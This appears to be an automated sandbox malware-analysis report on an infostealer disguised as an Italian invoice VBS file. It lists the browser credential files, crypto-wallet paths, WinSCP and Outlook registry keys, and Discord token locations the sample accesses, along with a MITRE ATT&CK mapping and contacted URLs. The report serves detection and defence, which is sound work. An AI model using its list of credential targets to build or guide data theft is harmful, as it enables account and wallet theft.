Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: InstallUtil.exe, 00000009.00000002.1450013749.00000000007C1000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected Discord Token Stealer

Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7928, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 2980, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum@\
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectronCash@\
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Jaxx L4
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q7C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectrumLTC@\
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q4C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus@\
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q@C:\Users\user\AppData\Roaming\Binance\Local Storage\leveldb
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum@\
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q9C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1410025378.0000000007810000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sqlcolumnencryptionkeystoreprovider

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 00000011.00000002.1617686351.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1452882158.0000000002607000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.1617686351.0000000003324000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1452882158.00000000027C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7928, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 2980, type: MEMORYSTR

Remote Access Functionality

Yara detected Discord Token Stealer

Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7928, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 2980, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	121 Scripting	Valid Accounts	141 Windows Management Instrumentation	121 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	211 Process Injection	3 Obfuscated Files or Information	1 Credentials in Registry	34 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Software Packing	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	2 Registry Run Keys / Startup Folder	2 Registry Run Keys / Startup Folder	1 DLL Side-Loading	NTDS	141 Security Software Discovery	Distributed Component Object Model	1 Clipboard Data	1 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	51 Virtualization/Sandbox Evasion	Cached Domain Credentials	51 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	211 Process Injection	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Fattura-24SC-99245969925904728562.vbs	26%	ReversingLabs	Script-WScript.Trojan.Heuristic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\OSDescription.vbs.exe	0%	ReversingLabs
C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://stackoverflow.com/q/14436606/23354	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://support.mozilla.org/products/firefox	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://crl.micro	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
https://stackoverflow.com/q/11564914/23354;	0%	URL Reputation	safe
https://stackoverflow.com/q/2152978/23354	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
90.168.9.0.in-addr.arpa	unknown	unknown	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://nuget.org/NuGet.exe	Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1390938323.0000000005DDC000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000005909000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://stackoverflow.com/q/14436606/23354	Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp, Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000005095000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1452882158.0000000002521000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.0000000004BC5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/mgravell/protobuf-netJ	Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1632367660.0000000004063000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://pesterbdd.com/images/Pester.png	OSDescription.vbs.exe, 0000000F.00000002.1547078793.00000000049F3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	OSDescription.vbs.exe, 0000000F.00000002.1547078793.00000000049F3000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1539348684.000000000277E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contoso.com/License	OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000005909000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://discordapp.com/api/v9/users/	InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://contoso.com/Icon	OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000005909000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/mgravell/protobuf-net	Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	InstallUtil.exe, 00000009.00000002.1452882158.000000000274E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003149000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	OSDescription.vbs.exe, 0000000F.00000002.1547078793.00000000049F3000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://support.mozilla.org/products/firefox	InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003149000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/mgravell/protobuf-neti	Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp	false		unknown
http://crl.micro	Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1357497221.0000000002C3C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore6lB	Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.00000000048A1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://stackoverflow.com/q/11564914/23354;	Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://stackoverflow.com/q/2152978/23354	Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000005909000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://icanhazip.com/	InstallUtil.exe, 00000009.00000002.1452882158.0000000002607000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1452882158.00000000027C4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://nuget.org/nuget.exe	Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1390938323.0000000005DDC000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000005909000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/	InstallUtil.exe, 00000009.00000002.1452882158.0000000002607000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1452882158.00000000027C4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.00000000048A1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.36.141.107	unknown	European Union		35368	AS-DBNETZDE	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1546109
Start date and time:	2024-10-31 14:15:06 +01:00
Joe Sandbox product:	CloudBasic
